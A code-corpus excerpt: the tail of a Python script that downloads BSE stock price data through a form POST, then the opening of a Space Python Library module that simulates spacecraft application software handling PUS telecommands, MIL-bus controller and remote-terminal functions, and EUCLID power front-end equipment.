'ctl00$ContentPlaceHolder1$hidCurrentDate' : edate,
'ctl00$ContentPlaceHolder1$hidCompanyVal' : 'SUBEX',
'ctl00$ContentPlaceHolder1$hdnCode' : script_code,
'ctl00$ContentPlaceHolder1$hdflag' : '0',
'ctl00$ContentPlaceHolder1$GetQuote1_smartSearch2' : 'Enter Script Name',
'ctl00$ContentPlaceHolder1$GetQuote1_smartSearch' : 'SUBEX LTD',
'ctl00$ContentPlaceHolder1$DMY' : 'rdbDaily',
'ctl00$ContentPlaceHolder1$DDate' : '',
}
dl2_map = {'ctl00$ContentPlaceHolder1$btnDownload.x': '9',
'ctl00$ContentPlaceHolder1$btnDownload.y' : '5',
}
form_data.update(other_data)
form_data.update(dl2_map)
module_logger.info("POST: %s", url)
module_logger.debug("POST Data: %s", form_data)
y = requests.post(url, data=form_data, stream=True)
if y.ok:
start_end = "_".join([sdate.replace("/", ""),
edate.replace("/", ""),
""])
fname = start_end + script_code + '.csv'
with open(fname, 'wb') as handle:
for block in y.iter_content(1024):
if not block:
break
handle.write(block)
else:
module_logger.error("Error(POST): %s", y.text)
if __name__ == '__main__':
print(get_data_for_security('500002', GLOBAL_START_DATE))
#for x in bse_get_all_stocks_list(100,1):
#get_data_for_security(x.bseid, GLOBAL_START_DATE)
| mit | 571,531,012,602,573,700 | 35.151515 | 89 | 0.590109 | false | 3.29558 | false | false | false |
Stefan-Korner/SpacePyLibrary | SPACE/ASW.py | 1 | 44245 | #******************************************************************************
# (C) 2018, Stefan Korner, Austria *
# *
# The Space Python Library is free software; you can redistribute it and/or *
# modify it under under the terms of the MIT License as published by the *
# Massachusetts Institute of Technology. *
# *
# The Space Python Library is distributed in the hope that it will be useful, *
# but WITHOUT ANY WARRANTY; without even the implied warranty of *
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the MIT License *
# for more details. *
#******************************************************************************
# Spacecraft Application Software *
#******************************************************************************
from UTIL.SYS import Error, LOG, LOG_INFO, LOG_WARNING, LOG_ERROR
import PUS.PACKET, PUS.SERVICES
import SPACE.IF
import SUPP.IF
import UTIL.DU, UTIL.SYS
#############
# constants #
#############
# MIL Bus general
# MIL Bus Controller
MTG_BC_PF_APID = 1920
MTG_BC_PL_APID = 1921
S4_BC_PF_APID = 1537
S4_BC_PL_APID = 1539
BC_Identify_FID = 0x4E21
BC_SelfTest_FID = 0x4E22
BC_GetSelfTestReport_FID = 0x4E23
BC_Reset_FID = 0x4E24
BC_Configure_FID = 0x4E25
BC_ConfigureFrame_FID = 0x4E26
BC_AddInterrogation_FID = 0x4E27
BC_Discover_FID = 0x4E28
E5013_SETUP_DIST_DATABLOCK_FID = 0x4E2D
BC_Start_FID = 0x4E2E
BC_Stop_FID = 0x4E2F
BC_ForceFrameSwitch_FID = 0x4E29
BC_Send_FID = 0x4E30
BC_SetData_FID = 0x4E31
BC_ForceBusSwitch_FID = 0x4E32
BC_InjectError_FID = 0x4E33
BC_ClearError_FID = 0x4E34
E5013_BC_ACTIVATE_FID = 0x4E35
E5013_BC_DEACTIVATE_FID = 0x4E36
E5013_DTD_FID = 0x4E39
# MIL Bus Remote Terminal
MTG_RT_PF_APID = 1922
MTG_RT_PL_APID = 1923
S4_RT_PF_APID = 1538
S4_RT_PL_APID = 1540
RT_Identify_FID = 0x4E3E
RT_SelfTest_FID = 0x4E3F
RT_GetSelfTestReport_FID = 0x4E40
RT_Configure_FID = 0x4E41
RT_AddResponse_FID = 0x4E42
RT_Reset_FID = 0x4E43
RT_SAEnable_FID = 0x4E44
E5013_SETUP_ACQU_DATABLOCK_FID = 0x4E2A
RT_Start_FID = 0x4E45
RT_Stop_FID = 0x4E46
RT_InjectError_FID = 0x4E47
RT_ClearError_FID = 0x4E48
E5013_RT_ACTIVATE_FID = 0x4E49
E5013_RT_DEACTIVATE_FID = 0x4E4A
E5013_ATR_FID = 0x4E4B
# EUCLID Power SCOEs
BS_Initialize = 0x0302
BS_SetLocal = 0x0314
BS_SetRemote = 0x0315
BS_LockInstruments = 0x0312
BS_UnlockInstruments = 0x0313
BS_SetOnline = 0x0307
BS_SetOffline = 0x0306
BS_SelfTest = 0x0311
FTH_Initialize = 0x0403
FTH_EnableGUI = 0x0435
FTH_DisableGUI = 0x0436
FTH_SetOnline = 0x0405
FTH_SetOffline = 0x0406
FTH_SelfTest = 0x0410
FTH_ConfigNEA = 0x0411
FTH_ConfigNEA_NEA_ID_BYTE_OFFSET = 14
FTH_ConfigNEA_NEA_ID_BYTE_SIZE = 64
FTH_ConfigNEA_A_LO_BYTE_OFFSET = 78
FTH_ConfigNEA_A_LO_BYTE_SIZE = 4
FTH_ConfigNEA_A_HI_min_BYTE_OFFSET = 82
FTH_ConfigNEA_A_HI_min_BYTE_SIZE = 4
FTH_ConfigNEA_A_HI_max_BYTE_OFFSET = 86
FTH_ConfigNEA_A_HI_max_BYTE_SIZE = 4
FTH_ConfigNEA_Tmin_BYTE_OFFSET = 90
FTH_ConfigNEA_Tmin_BYTE_SIZE = 1
FTH_ConfigNEA_Tmax_BYTE_OFFSET = 91
FTH_ConfigNEA_Tmax_BYTE_SIZE = 1
FTH_ConfigNEA_NEA_TYPE_BYTE_OFFSET = 92
FTH_ConfigNEA_NEA_TYPE_BYTE_SIZE = 64
FTH_SelectNEA = 0x0434
FTH_SelectNEA_NEA_ID_BYTE_OFFSET = 14
FTH_SelectNEA_NEA_ID_BYTE_SIZE = 64
FTH_SelectNEA_NEA_TYPE_BYTE_OFFSET = 78
FTH_SelectNEA_NEA_TYPE_BYTE_SIZE = 64
FTH_SelectNEA_select_BYTE_OFFSET = 142
FTH_SelectNEA_select_BYTE_SIZE = 1
FTH_NEA_Mask_BYTE_SIZE = 128
FTH_NEA_Pulse_BYTE_SIZE = 128
LPS_Initialize = 0x0022
LPS_SetLocal = 0x0041
LPS_SetRemote = 0x0042
LPS_LockInstruments = 0x0039
LPS_UnlockInstruments = 0x0040
LPS_SetOnLine = 0x0016
LPS_SetOffLine = 0x0017
LPS_SelfTest = 0x0035
SAS_Initialize = 0x0210
SAS_SetLocal = 0x0233
SAS_SetRemote = 0x0234
SAS_LockInstruments = 0x0229
SAS_UnlockInstruments = 0x0230
SAS_SetOnline = 0x0206
SAS_SetOffline = 0x0208
SAS_SelfTest = 0x0225
# Commanding Mode
EPWR_CMD_LOCAL = "0"
EPWR_CMD_REMOTE = "1"
# Operation Mode
EPWR_OP_OFFLINE = "0"
EPWR_OP_OFFLINE2 = "4"
EPWR_OP_ONLINE = "8"
EPWR_OP_ONLINE2 = "15"
EPWR_OP_FTH_ONLINE = "1"
EPWR_BS_OP = "CHSTAT1"
EPWR_FTH_OP = "ONOFF"
EPWR_LPS_OP_Section1P = "CHSTAT1"
EPWR_LPS_OP_Section1S = "CHSTAT2"
EPWR_LPS_OP_Section2P = "CHSTAT3"
EPWR_LPS_OP_Section2S = "CHSTAT4"
EPWR_LPS_OP_Section3P = "CHSTAT5"
EPWR_LPS_OP_Section3S = "CHSTAT6"
EPWR_SAS_OP_Section1 = "CHSTATSA1"
EPWR_SAS_OP_Section2 = "CHSTATSA2"
EPWR_SAS_OP_Section3 = "CHSTATSA3"
EPWR_SAS_OP_Section4 = "CHSTATSA4"
EPWR_SAS_OP_Section5 = "CHSTATSA5"
EPWR_SAS_OP_Section6 = "CHSTATSA6"
EPWR_SAS_OP_Section7 = "CHSTATSA7"
EPWR_SAS_OP_Section8 = "CHSTATSA8"
EPWR_SAS_OP_Section9 = "CHSTATSA9"
EPWR_SAS_OP_Section10 = "CHSTATSA10"
EPWR_SAS_OP_Section11 = "CHSTATSA11"
EPWR_SAS_OP_Section12 = "CHSTATSA12"
EPWR_SAS_OP_Section13 = "CHSTATSA13"
EPWR_SAS_OP_Section14 = "CHSTATSA14"
EPWR_SAS_OP_Section15 = "CHSTATSA15"
# SCOE Running
EPWR_SRUN_LPSN = "0,1"
EPWR_SRUN_LPSR = "1,1"
EPWR_SRUN_SAS = "0,0"
EPWR_SRUN_PARAMS = "ONOFF11,ONOFF12"
###########
# classes #
###########
# =============================================================================
class ApplicationSoftwareImpl(SPACE.IF.ApplicationSoftware):
"""Implementation of the spacecraft's application software"""
# ---------------------------------------------------------------------------
def __init__(self):
"""Initialise attributes only"""
self.tcFunctionIdBytePos = \
int(UTIL.SYS.s_configuration.TC_FKT_ID_BYTE_OFFSET)
self.tcFunctionIdByteSize = \
int(UTIL.SYS.s_configuration.TC_FKT_ID_BYTE_SIZE)
self.connectionTestReportMnemo = \
UTIL.SYS.s_configuration.TM_TEST_MNEMO
# ---------------------------------------------------------------------------
# can be overloaded in derived classes
def processFunctionService(self, apid, tcFunctionId, tcPacketDu):
"""default processing of PUS Service (8,1) telecommand packet"""
return self.processDefault(apid, tcPacketDu)
# ---------------------------------------------------------------------------
# can be overloaded in derived classes
def processTestService(self, apid, tcPacketDu):
"""default processing of the PUS Service (17,1) telecommand packet"""
LOG("ASW: Connection Test", "SPACE")
return SPACE.IF.s_onboardComputer.generateEmptyTMpacket(
self.connectionTestReportMnemo)
# ---------------------------------------------------------------------------
# can be overloaded in derived classes
def processDefault(self, apid, tcPacketDu):
"""default implementation of TC processing"""
LOG("ASW: Standard Telecommand", "SPACE")
return True
# ---------------------------------------------------------------------------
def processTCpacket(self, tcPacketDu):
"""
processes a telecommand packet from the CCS
implementation of SPACE.IF.ApplicationSoftware.processTCpacket
"""
apid = tcPacketDu.applicationProcessId
LOG_INFO("ApplicationSoftwareImpl.processTCpacket(" + str(apid) + ")", "SPACE")
# processing of PUS telecommands
if PUS.PACKET.isPUSpacketDU(tcPacketDu):
if tcPacketDu.serviceType == PUS.SERVICES.TC_FKT_TYPE:
# packet is a PUS Function Management command
if tcPacketDu.serviceSubType == PUS.SERVICES.TC_FKT_PERFORM_FUNCTION:
tcFunctionId = tcPacketDu.getUnsigned(
self.tcFunctionIdBytePos, self.tcFunctionIdByteSize)
LOG("tcFunctionId = " + str(tcFunctionId), "SPACE")
return self.processFunctionService(apid, tcFunctionId, tcPacketDu)
elif tcPacketDu.serviceType == PUS.SERVICES.TC_TEST_TYPE:
# packet is a PUS Test command
if tcPacketDu.serviceSubType == PUS.SERVICES.TC_TEST_SUBTYPE:
return self.processTestService(apid, tcPacketDu)
# other telecommand
return self.processDefault(apid, tcPacketDu)
# =============================================================================
class MILapplicationSoftwareImpl(ApplicationSoftwareImpl):
"""Specialization of the spacecraft's application software"""
# ---------------------------------------------------------------------------
def __init__(self):
"""Initialise attributes only"""
ApplicationSoftwareImpl.__init__(self)
# ---------------------------------------------------------------------------
# shall be overloaded in derived classes
def sendBC_Identity(self, bus):
pass
def sendBC_SelfTestResponse(self, bus, errorId):
pass
def sendBC_SelfTestReport(self, bus):
pass
def sendBC_ResetResponse(self, bus):
pass
def sendRT_Identity(self, bus):
pass
def sendRT_SelfTestResponse(self, bus, errorId):
pass
def sendRT_SelfTestReport(self, bus):
pass
def sendRT_ResetResponse(self, bus):
pass
# ---------------------------------------------------------------------------
def processFunctionService(self, apid, tcFunctionId, tcPacketDu):
"""
processes PUS Service (8,1) telecommand packet
implementation of ApplicationSoftwareImpl.processFunctionService
"""
forwardToBc = False
forwardToRt = False
if apid == self.getBcPfAPID():
forwardToBc = True
bus = SPACE.IF.MIL_BUS_PF
elif apid == self.getBcPlAPID():
forwardToBc = True
bus = SPACE.IF.MIL_BUS_PL
elif apid == self.getRtPfAPID():
forwardToRt = True
bus = SPACE.IF.MIL_BUS_PF
elif apid == self.getRtPlAPID():
forwardToRt = True
bus = SPACE.IF.MIL_BUS_PL
else:
# unexpected APID
LOG_ERROR("ASW: unexpected APID: " + str(apid), "SPACE")
return False
if forwardToBc and SPACE.IF.s_milBusController != None:
if tcFunctionId == BC_Identify_FID:
if SPACE.IF.s_milBusController.identify(bus):
return self.sendBC_Identity(bus)
LOG_ERROR("ASW: BC_Identify failed", "SPACE")
return False
elif tcFunctionId == BC_SelfTest_FID:
errorId = 1
if SPACE.IF.s_milBusController.selfTest(bus):
errorId = 0
return self.sendBC_SelfTestResponse(bus, errorId)
elif tcFunctionId == BC_GetSelfTestReport_FID:
if SPACE.IF.s_milBusController.getSelfTestReport(bus):
return self.sendBC_SelfTestReport(bus)
LOG_ERROR("ASW: BC_GetSelfTestReport failed", "SPACE")
return False
elif tcFunctionId == BC_Reset_FID:
if SPACE.IF.s_milBusController.reset(bus):
return self.sendBC_ResetResponse(bus)
LOG_ERROR("ASW: BC_Reset failed", "SPACE")
return False
elif tcFunctionId == BC_Configure_FID:
return SPACE.IF.s_milBusController.configure(bus)
elif tcFunctionId == BC_ConfigureFrame_FID:
return SPACE.IF.s_milBusController.configureFrame(bus)
elif tcFunctionId == BC_AddInterrogation_FID:
return SPACE.IF.s_milBusController.addInterrogation(bus)
elif tcFunctionId == BC_Discover_FID:
return SPACE.IF.s_milBusController.discover(bus)
elif tcFunctionId == E5013_SETUP_DIST_DATABLOCK_FID:
return SPACE.IF.s_milBusController.setupDistDatablock(bus)
elif tcFunctionId == BC_Start_FID:
return SPACE.IF.s_milBusController.start(bus)
elif tcFunctionId == BC_Stop_FID:
return SPACE.IF.s_milBusController.stop(bus)
elif tcFunctionId == BC_ForceFrameSwitch_FID:
return SPACE.IF.s_milBusController.forceFrameSwitch(bus)
elif tcFunctionId == BC_Send_FID:
return SPACE.IF.s_milBusController.send(bus)
elif tcFunctionId == BC_SetData_FID:
return SPACE.IF.s_milBusController.setData(bus)
elif tcFunctionId == BC_ForceBusSwitch_FID:
return SPACE.IF.s_milBusController.forceBusSwitch(bus)
elif tcFunctionId == BC_InjectError_FID:
return SPACE.IF.s_milBusController.injectError(bus)
elif tcFunctionId == BC_ClearError_FID:
return SPACE.IF.s_milBusController.clearError(bus)
elif tcFunctionId == E5013_BC_ACTIVATE_FID:
return SPACE.IF.s_milBusController.activate(bus)
elif tcFunctionId == E5013_BC_DEACTIVATE_FID:
return SPACE.IF.s_milBusController.deactivate(bus)
elif tcFunctionId == E5013_DTD_FID:
return SPACE.IF.s_milBusController.dtd(bus)
elif forwardToRt and SPACE.IF.s_milBusRemoteTerminals != None:
if tcFunctionId == RT_Identify_FID:
if SPACE.IF.s_milBusRemoteTerminals.identify(bus):
return self.sendRT_Identity(bus)
LOG_ERROR("ASW: RT_Identify failed", "SPACE")
return False
elif tcFunctionId == RT_SelfTest_FID:
errorId = 1
if SPACE.IF.s_milBusRemoteTerminals.selfTest(bus):
errorId = 0
return self.sendRT_SelfTestResponse(bus, errorId)
elif tcFunctionId == RT_GetSelfTestReport_FID:
if SPACE.IF.s_milBusRemoteTerminals.getSelfTestReport(bus):
return self.sendRT_SelfTestReport(bus)
LOG_ERROR("ASW: RT_GetSelfTestReport failed", "SPACE")
return False
elif tcFunctionId == RT_Configure_FID:
return SPACE.IF.s_milBusRemoteTerminals.configure(bus)
elif tcFunctionId == RT_AddResponse_FID:
return SPACE.IF.s_milBusRemoteTerminals.addResponse(bus)
elif tcFunctionId == RT_Reset_FID:
if SPACE.IF.s_milBusRemoteTerminals.reset(bus):
return self.sendRT_ResetResponse(bus)
LOG_ERROR("ASW: RT_Reset failed", "SPACE")
return False
elif tcFunctionId == RT_SAEnable_FID:
return SPACE.IF.s_milBusRemoteTerminals.saEnable(bus)
elif tcFunctionId == E5013_SETUP_ACQU_DATABLOCK_FID:
return SPACE.IF.s_milBusRemoteTerminals.setupAcquDatablock(bus)
elif tcFunctionId == RT_Start_FID:
return SPACE.IF.s_milBusRemoteTerminals.start(bus)
elif tcFunctionId == RT_Stop_FID:
return SPACE.IF.s_milBusRemoteTerminals.stop(bus)
elif tcFunctionId == RT_InjectError_FID:
return SPACE.IF.s_milBusRemoteTerminals.injectError(bus)
elif tcFunctionId == RT_ClearError_FID:
return SPACE.IF.s_milBusRemoteTerminals.clearError(bus)
elif tcFunctionId == E5013_RT_ACTIVATE_FID:
return SPACE.IF.s_milBusRemoteTerminals.activate(bus)
elif tcFunctionId == E5013_RT_DEACTIVATE_FID:
return SPACE.IF.s_milBusRemoteTerminals.deactivate(bus)
elif tcFunctionId == E5013_ATR_FID:
return SPACE.IF.s_milBusRemoteTerminals.atr(bus)
return True
# ---------------------------------------------------------------------------
def notifyMILdatablockAcquisition(self, rtAddress, dataBlock):
"""
The BC has received on the MIL Bus a data block from a RT
"""
LOG_INFO("ApplicationSoftwareImpl.notifyMILdatablockAcquisition(" + str(rtAddress) + ")", "SPACE")
# ---------------------------------------------------------------------------
def notifyMILdatablockDistribution(self, rtAddress, dataBlock):
"""
The mRT has received on the MIL Bus a data block from the BC
"""
LOG_INFO("ApplicationSoftwareImpl.notifyMILdatablockDistribution(" + str(rtAddress) + ")", "SPACE")
# =============================================================================
class MTGapplicationSoftwareImpl(MILapplicationSoftwareImpl):
"""Implementation of the MTG spacecraft's application software"""
# ---------------------------------------------------------------------------
def __init__(self):
"""Initialise attributes only"""
MILapplicationSoftwareImpl.__init__(self)
# ---------------------------------------------------------------------------
def getBcPfAPID(self):
"""implementation of SPACE.IF.ApplicationSoftware.getBcPfAPID"""
return MTG_BC_PF_APID
# ---------------------------------------------------------------------------
def getBcPlAPID(self):
"""implementation of SPACE.IF.ApplicationSoftware.getBcPfAPID"""
return MTG_BC_PL_APID
# ---------------------------------------------------------------------------
def getRtPfAPID(self):
"""implementation of SPACE.IF.ApplicationSoftware.getBcPfAPID"""
return MTG_RT_PF_APID
# ---------------------------------------------------------------------------
def getRtPlAPID(self):
"""implementation of SPACE.IF.ApplicationSoftware.getBcPfAPID"""
return MTG_RT_PL_APID
# ---------------------------------------------------------------------------
def sendBC_Identity(self, bus):
"""implementation of ApplicationSoftwareImpl.sendBC_Identity"""
if bus == SPACE.IF.MIL_BUS_PF:
return SPACE.IF.s_onboardComputer.generateEmptyTMpacket("YD2TMPK00001")
else:
return SPACE.IF.s_onboardComputer.generateEmptyTMpacket("YD2TMPK00501")
# ---------------------------------------------------------------------------
def sendBC_SelfTestResponse(self, bus, errorId):
"""implementation of ApplicationSoftwareImpl.sendBC_SelfTestResponse"""
if bus == SPACE.IF.MIL_BUS_PF:
pktMnemonic = "YD2TMPK00002"
parErrorId = "ZD2M182X"
else:
pktMnemonic = "YD2TMPK00502"
parErrorId = "ZD2M682X"
tmPacketData = SUPP.IF.s_definitions.getTMpacketInjectData(pktMnemonic,
parErrorId, str(errorId))
# check the TM packet data
if tmPacketData == None:
LOG_ERROR("TM packet creation failed for " + pktMnemonic, "SPACE")
return False
# send the TM packet
return SPACE.IF.s_onboardComputer.generateTMpacket(tmPacketData)
# ---------------------------------------------------------------------------
def sendBC_SelfTestReport(self, bus):
"""implementation of ApplicationSoftwareImpl.sendBC_SelfTestReport"""
if bus == SPACE.IF.MIL_BUS_PF:
return SPACE.IF.s_onboardComputer.generateEmptyTMpacket("YD2TMPK00003")
else:
return SPACE.IF.s_onboardComputer.generateEmptyTMpacket("YD2TMPK00503")
# ---------------------------------------------------------------------------
def sendBC_ResetResponse(self, bus):
"""implementation of ApplicationSoftwareImpl.sendBC_ResetResponse"""
if bus == SPACE.IF.MIL_BUS_PF:
return SPACE.IF.s_onboardComputer.generateEmptyTMpacket("YD2TMPK00004")
else:
return SPACE.IF.s_onboardComputer.generateEmptyTMpacket("YD2TMPK00504")
# ---------------------------------------------------------------------------
def sendRT_Identity(self, bus):
"""implementation of ApplicationSoftwareImpl.sendRT_Identity"""
if bus == SPACE.IF.MIL_BUS_PF:
return SPACE.IF.s_onboardComputer.generateEmptyTMpacket("YD2TMPK00030")
else:
return SPACE.IF.s_onboardComputer.generateEmptyTMpacket("YD2TMPK00530")
# ---------------------------------------------------------------------------
def sendRT_SelfTestResponse(self, bus, errorId):
"""implementation of ApplicationSoftwareImpl.sendRT_SelfTestResponse"""
if bus == SPACE.IF.MIL_BUS_PF:
pktMnemonic = "YD2TMPK00031"
parErrorId = "ZD2M198X"
else:
pktMnemonic = "YD2TMPK00531"
parErrorId = "ZD2M698X"
tmPacketData = SUPP.IF.s_definitions.getTMpacketInjectData(pktMnemonic,
parErrorId, str(errorId))
# check the TM packet data
if tmPacketData == None:
LOG_ERROR("TM packet creation failed for " + pktMnemonic, "SPACE")
return False
# send the TM packet
return SPACE.IF.s_onboardComputer.generateTMpacket(tmPacketData)
# ---------------------------------------------------------------------------
def sendRT_SelfTestReport(self, bus):
"""implementation of ApplicationSoftwareImpl.sendRT_SelfTestReport"""
if bus == SPACE.IF.MIL_BUS_PF:
return SPACE.IF.s_onboardComputer.generateEmptyTMpacket("YD2TMPK00032")
else:
return SPACE.IF.s_onboardComputer.generateEmptyTMpacket("YD2TMPK00532")
# ---------------------------------------------------------------------------
def sendRT_ResetResponse(self, bus):
"""implementation of ApplicationSoftwareImpl.sendRT_ResetResponse"""
if bus == SPACE.IF.MIL_BUS_PF:
return SPACE.IF.s_onboardComputer.generateEmptyTMpacket("YD2TMPK00035")
else:
return SPACE.IF.s_onboardComputer.generateEmptyTMpacket("YD2TMPK00535")
# =============================================================================
class S4applicationSoftwareImpl(MILapplicationSoftwareImpl):
"""Implementation of the Sentinel 4 spacecraft's application software"""
# ---------------------------------------------------------------------------
def __init__(self):
"""Initialise attributes only"""
MILapplicationSoftwareImpl.__init__(self)
# ---------------------------------------------------------------------------
def getBcPfAPID(self):
"""implementation of SPACE.IF.ApplicationSoftware.getBcPfAPID"""
return S4_BC_PF_APID
# ---------------------------------------------------------------------------
def getBcPlAPID(self):
"""implementation of SPACE.IF.ApplicationSoftware.getBcPfAPID"""
return S4_BC_PL_APID
# ---------------------------------------------------------------------------
def getRtPfAPID(self):
"""implementation of SPACE.IF.ApplicationSoftware.getBcPfAPID"""
return S4_RT_PF_APID
# ---------------------------------------------------------------------------
def getRtPlAPID(self):
"""implementation of SPACE.IF.ApplicationSoftware.getBcPfAPID"""
return S4_RT_PL_APID
# ---------------------------------------------------------------------------
def sendBC_Identity(self, bus):
"""implementation of ApplicationSoftwareImpl.sendBC_Identity"""
if bus == SPACE.IF.MIL_BUS_PF:
return SPACE.IF.s_onboardComputer.generateEmptyTMpacket("XPSTMPK10101")
else:
return SPACE.IF.s_onboardComputer.generateEmptyTMpacket("XPSTMPK10601")
# ---------------------------------------------------------------------------
def sendBC_SelfTestResponse(self, bus, errorId):
"""implementation of ApplicationSoftwareImpl.sendBC_SelfTestResponse"""
if bus == SPACE.IF.MIL_BUS_PF:
pktMnemonic = "XPSTMPK10102"
parErrorId = "XPSM100X"
else:
pktMnemonic = "XPSTMPK10602"
parErrorId = "XPSM600X"
tmPacketData = SUPP.IF.s_definitions.getTMpacketInjectData(pktMnemonic,
parErrorId, str(errorId))
# check the TM packet data
if tmPacketData == None:
LOG_ERROR("TM packet creation failed for " + pktMnemonic, "SPACE")
return False
# send the TM packet
return SPACE.IF.s_onboardComputer.generateTMpacket(tmPacketData)
# ---------------------------------------------------------------------------
def sendBC_SelfTestReport(self, bus):
"""implementation of ApplicationSoftwareImpl.sendBC_SelfTestReport"""
if bus == SPACE.IF.MIL_BUS_PF:
return SPACE.IF.s_onboardComputer.generateEmptyTMpacket("XPSTMPK10103")
else:
return SPACE.IF.s_onboardComputer.generateEmptyTMpacket("XPSTMPK10603")
# ---------------------------------------------------------------------------
def sendBC_ResetResponse(self, bus):
"""implementation of ApplicationSoftwareImpl.sendBC_ResetResponse"""
if bus == SPACE.IF.MIL_BUS_PF:
return SPACE.IF.s_onboardComputer.generateEmptyTMpacket("XPSTMPK10104")
else:
return SPACE.IF.s_onboardComputer.generateEmptyTMpacket("XPSTMPK10604")
# ---------------------------------------------------------------------------
def sendRT_Identity(self, bus):
"""implementation of ApplicationSoftwareImpl.sendRT_Identity"""
if bus == SPACE.IF.MIL_BUS_PF:
return SPACE.IF.s_onboardComputer.generateEmptyTMpacket("XPSTMPK10130")
else:
return SPACE.IF.s_onboardComputer.generateEmptyTMpacket("XPSTMPK10630")
# ---------------------------------------------------------------------------
def sendRT_SelfTestResponse(self, bus, errorId):
"""implementation of ApplicationSoftwareImpl.sendRT_SelfTestResponse"""
if bus == SPACE.IF.MIL_BUS_PF:
pktMnemonic = "XPSTMPK10131"
parErrorId = "XPSM184X"
else:
pktMnemonic = "XPSTMPK10631"
parErrorId = "XPSM684X"
tmPacketData = SUPP.IF.s_definitions.getTMpacketInjectData(pktMnemonic,
parErrorId, str(errorId))
# check the TM packet data
if tmPacketData == None:
LOG_ERROR("TM packet creation failed for " + pktMnemonic, "SPACE")
return False
# send the TM packet
return SPACE.IF.s_onboardComputer.generateTMpacket(tmPacketData)
# ---------------------------------------------------------------------------
def sendRT_SelfTestReport(self, bus):
"""implementation of ApplicationSoftwareImpl.sendRT_SelfTestReport"""
if bus == SPACE.IF.MIL_BUS_PF:
return SPACE.IF.s_onboardComputer.generateEmptyTMpacket("XPSTMPK10132")
else:
return SPACE.IF.s_onboardComputer.generateEmptyTMpacket("XPSTMPK10632")
# ---------------------------------------------------------------------------
def sendRT_ResetResponse(self, bus):
"""implementation of ApplicationSoftwareImpl.sendRT_ResetResponse"""
if bus == SPACE.IF.MIL_BUS_PF:
return SPACE.IF.s_onboardComputer.generateEmptyTMpacket("XPSTMPK10135")
else:
return SPACE.IF.s_onboardComputer.generateEmptyTMpacket("XPSTMPK10635")
# =============================================================================
class EUCLIDpowerFEEsim_BS(ApplicationSoftwareImpl):
"""Implementation of the EUCLID BS Power Frontend Simulation"""
# ---------------------------------------------------------------------------
def __init__(self):
"""Initialise attributes only"""
ApplicationSoftwareImpl.__init__(self)
self.commandingMode = EPWR_CMD_LOCAL
self.operationMode = EPWR_OP_OFFLINE
# ---------------------------------------------------------------------------
def processFunctionService(self, apid, tcFunctionId, tcPacketDu):
"""
processes PUS Service (8,1) telecommand packet
implementation of ApplicationSoftwareImpl.processFunctionService
"""
if tcFunctionId == BS_Initialize:
LOG_INFO("*** BS_Initialize ***", "SPACE")
LOG("push HKTM", "SPACE")
return self.sendBS_Monitor()
elif tcFunctionId == BS_SetLocal:
LOG_INFO("*** BS_SetLocal ***", "SPACE")
LOG("set the SCOE into the LOCAL commanding mode", "SPACE")
self.commandingMode = EPWR_CMD_LOCAL
elif tcFunctionId == BS_SetRemote:
LOG_INFO("*** BS_SetRemote ***", "SPACE")
LOG("set the SCOE into the REMOTE commanding mode", "SPACE")
self.commandingMode = EPWR_CMD_REMOTE
elif tcFunctionId == BS_LockInstruments:
LOG_INFO("*** BS_LockInstruments ***", "SPACE")
LOG("not used for simulation", "SPACE")
elif tcFunctionId == BS_UnlockInstruments:
LOG_INFO("*** BS_UnlockInstruments ***", "SPACE")
LOG("not used for simulation", "SPACE")
elif tcFunctionId == BS_SetOnline:
LOG_INFO("*** BS_SetOnline ***", "SPACE")
LOG("set the SCOE into the ONLINE operation mode", "SPACE")
self.operationMode = EPWR_OP_ONLINE
return self.sendBS_Monitor()
elif tcFunctionId == BS_SetOffline:
LOG_INFO("*** BS_SetOffline ***", "SPACE")
LOG("set the SCOE into the OFFLINE operation mode", "SPACE")
self.operationMode = EPWR_OP_OFFLINE
return self.sendBS_Monitor()
elif tcFunctionId == BS_SelfTest:
LOG_INFO("*** BS_SelfTest ***", "SPACE")
# the SELFTEST is only allowed in OFFLINE mode
if self.operationMode == EPWR_OP_ONLINE:
LOG_ERROR("SELFTEST not allowed when system is ONLINE", "SPACE")
return False
else:
# unexpected Function ID
LOG_WARNING("no simulation for Function ID " + str(tcFunctionId) + " implemented", "SPACE")
return True
# ---------------------------------------------------------------------------
def sendBS_Monitor(self):
"""sends the LPS_Monitor TM packet to CCS"""
pktMnemonic = "BS_Monitor"
params = EPWR_BS_OP
values = self.operationMode
tmPacketData = SUPP.IF.s_definitions.getTMpacketInjectData(pktMnemonic,
params,
values)
# check the TM packet data
if tmPacketData == None:
LOG_ERROR("TM packet creation failed for " + pktMnemonic, "SPACE")
return False
# send the TM packet
return SPACE.IF.s_onboardComputer.generateTMpacket(tmPacketData)
# =============================================================================
class EUCLIDpowerFEEsim_FTH(ApplicationSoftwareImpl):
"""Implementation of the EUCLID FTH Power Frontend Simulation"""
# ---------------------------------------------------------------------------
def __init__(self):
"""Initialise attributes only"""
ApplicationSoftwareImpl.__init__(self)
self.commandingMode = EPWR_CMD_LOCAL
self.operationMode = EPWR_OP_OFFLINE
# ---------------------------------------------------------------------------
def processFunctionService(self, apid, tcFunctionId, tcPacketDu):
"""
processes PUS Service (8,1) telecommand packet
implementation of ApplicationSoftwareImpl.processFunctionService
"""
if tcFunctionId == FTH_Initialize:
LOG_INFO("*** FTH_Initialize ***", "SPACE")
LOG("push HKTM", "SPACE")
return self.sendFTH_MonitorProUST()
elif tcFunctionId == FTH_EnableGUI:
LOG_INFO("*** FTH_EnableGUI ***", "SPACE")
LOG("set the SCOE into the REMOTE commanding mode", "SPACE")
self.commandingMode = EPWR_CMD_REMOTE
elif tcFunctionId == FTH_DisableGUI:
LOG_INFO("*** FTH_DisableGUI ***", "SPACE")
LOG("set the SCOE into the LOCAL commanding mode", "SPACE")
self.commandingMode = EPWR_CMD_LOCAL
elif tcFunctionId == FTH_SetOnline:
LOG_INFO("*** FTH_SetOnline ***", "SPACE")
LOG("set the SCOE into the ONLINE operation mode", "SPACE")
self.operationMode = EPWR_OP_FTH_ONLINE
return self.sendFTH_MonitorProUST()
elif tcFunctionId == FTH_SetOffline:
LOG_INFO("*** FTH_SetOffline ***", "SPACE")
LOG("set the SCOE into the OFFLINE operation mode", "SPACE")
self.operationMode = EPWR_OP_OFFLINE
return self.sendFTH_MonitorProUST()
elif tcFunctionId == FTH_SelfTest:
LOG_INFO("*** FTH_SelfTest ***", "SPACE")
# the SELFTEST is only allowed in OFFLINE mode
if self.operationMode == EPWR_OP_FTH_ONLINE:
LOG_ERROR("SELFTEST not allowed when system is ONLINE", "SPACE")
